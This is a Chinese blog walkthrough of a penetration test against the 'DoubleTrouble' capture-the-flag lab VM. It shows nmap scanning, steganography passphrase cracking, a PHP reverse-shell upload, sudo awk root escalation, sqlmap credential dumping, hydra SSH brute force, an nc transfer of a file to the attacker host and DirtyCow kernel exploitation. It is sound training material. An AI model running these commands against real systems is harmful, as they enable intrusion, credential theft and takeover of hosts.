DOUBLETROUBLE: 1靶机渗透记录

最新推荐文章于 2024-05-30 11:43:13 发布
althumi
最新推荐文章于 2024-05-30 11:43:13 发布
阅读量415
点赞数 11
文章标签：网络安全 ctf 内网渗透靶机 python
本文链接：https://blog.csdn.net/althumi/article/details/135105640
版权
nmap -sP 10.80.56.0/24

主机：10.80.56.101
靶机：10.80.56.178

nmap -p- 10.80.56.178

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

nmap -A -n 22 10.80.56.178
nmap -A -n 80 10.80.56.178

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: qdPM | Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

dirsearch -u http://10.80.56.178/

[20:26:21] 200 -  406B  - /backups/                                         
[20:26:23] 200 -    0B  - /check.php 
[20:26:30] 200 -  647B  - /images/                                          
[20:26:30] 200 -    2KB - /index.php                                        
[20:26:30] 200 -    2KB - /index.php/login/ 
[20:26:31] 200 -  762B  - /install/index.php?upgrade/                       
[20:26:31] 200 -  762B  - /install/                                         
[20:26:31] 200 -  606B  - /js/                                              
[20:26:41] 200 -  338B  - /                                      
[20:26:42] 200 -   26B  - /robots.txt                                                                                                                                                                              
[20:26:42] 200 -  461B  - /secret/ 
[20:26:48] 200 -  476B  - /uploads/

#获得关键信息
wget http://10.80.56.178/secret/doubletrouble.jpg

#尝试漏洞搜索，发现有文件上传漏洞，不过需要登录到后台
searchsploit  qdPM 9.1

#破解关键信息，尝试steghide读取，发现有密码
steghide extract -sf doubletrouble.jpg
#使用stegseek爆破，爆破成功
stegseek doubletrouble.jpg 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "92camaro"       
[i] Original filename: "creds.txt".
[i] Extracting to "doubletrouble.jpg.out".

#提取隐写内容，是账号和密码
cat creds.txt 
otisrush@localhost.com
otis666 

#漏洞内容是账户上传头像处，可以上传木马，有报错，但还是能上传。
#文档说的是官方正则写错了，能拦截，但是报错不拦了
#上传php反弹shell脚本，开启交互式木马
python -c "import pty;pty.spawn('/bin/bash')"

#收集信息
cat .htaccess
Order Deny,Allow
Deny from all
#尝试提权，发现awk是root权限
sudo -l
Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
#执行提权命令，提权成功
sudo awk 'BEGIN {system("/bin/sh")}'

#发现根目录存在另一个镜像，果然是双重麻烦
doubletrouble.ova

python3 -m http.server 8080

wget http://10.80.56.178:8080/doubletrouble.ova


#开启下一个麻烦

nmap -sP 10.80.56.0/24

主机：10.80.56.101
靶机：10.80.56.178

nmap -p- 10.80.56.178

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

nmap -A -n 22 10.80.56.178
nmap -A -n 80 10.80.56.178

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 e8:4f:84:fc:7a:20:37:8b:2b:f3:14:a9:54:9e:b7:0f (DSA)
|   2048 0c:10:50:f5:a2:d8:74:f1:94:c5:60:d7:1a:78:a4:e6 (RSA)
|_  256 05:03:95:76:0c:7f:ac:db:b2:99:13:7e:9c:26:ca:d1 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).

#进入主页，发现是登录页面，没有回显，可能是sql注入，sqlmap尝试发现是延时注入
sqlmap -u http://10.80.56.178/index.php --data="uname=admin&psw=12345" -D doubletrouble -T users -C username,password --dump

available databases [2]:
[*] doubletrouble
[*] information_schema

Database: doubletrouble
[1 table]
+-------+
| users |
+-------+

Database: doubletrouble
Table: users
[2 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| montreux | GfsZxc1  |
| clapton  | ZubZub99 |
+----------+----------+

#数据库获取用户和密码，尝试九头蛇爆破
hydra -L user.txt -P pass.txt 10.80.56.178 ssh

[22][ssh] host: 10.80.56.178   login: clapton   password: ZubZub99

#获得第一个flag
cat user.txt
6CEA7A737C7C651F6DA7669109B5FB52clapton@doubletrouble

cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDNLhnhzhOvRSRJ2fzkWgNfJ0gxrQvFupKVcS8SDAf8GFjsNd9Gy5FgcWSt7s54j+EumUfHVNwupZuMsRYphg/zpTBwUQ4vgBGPbLUqw64tW2OucbidJ5m6QoS0UkMkjmSBKuOAy0c/BdMSLi0f6aYnlH/H9FL0JYk4jLHVawA+h1RfjlDiRBteSDKh7Mqv1RMnRHZE0bzGEMVSTkNEyeMqZbrqguuvBk2RzMHUqzVLVgw91TVPnDRqd02tI/YjECkyp/igp+4ozqPQQ361biMYF62ft7eIN2uHWzXVcb9GvezXIOzXcYmOQ+H88KUqezVMPvHDAzGRWf0pKOAccukH clapton@doubletrouble

#发现神秘zip，解压发现里面存在有密码的zip
nc 10.80.56.101 1234 < get.zip

#爆破成功
zip2john get.zip | tee hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
myspace4         (spammer.zip/creds.txt)   

#获得一窜字符串，以为是另一个用户密码，但是失败了
mayer:lionheart

#查看linux版本
uname -a
Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux

#查询发现linux内核3.2.0，存在脏牛漏洞，https://github.com/firefart/dirtycow/blob/master/dirty.c
gcc dirty.c -o dirty

#发现缺少crypt，以及pthread
/tmp/ccztF1Hz.o: In function `generate_password_hash':
exp.c:(.text+0x1e): undefined reference to `crypt'
/tmp/ccztF1Hz.o: In function `main':
exp.c:(.text+0x4cd): undefined reference to `pthread_create'
exp.c:(.text+0x501): undefined reference to `pthread_join'
collect2: error: ld returned 1 exit status

#查询添加-l链接crypt，以及pthread
gcc -pthread dirty.c -o dirty -lcrypt

#执行根据提示，切换firefart用户，获得root权限
cat root.txt 
1B8EEA89EA92CECB931E3CC25AA8DE21firefart@doubletrouble: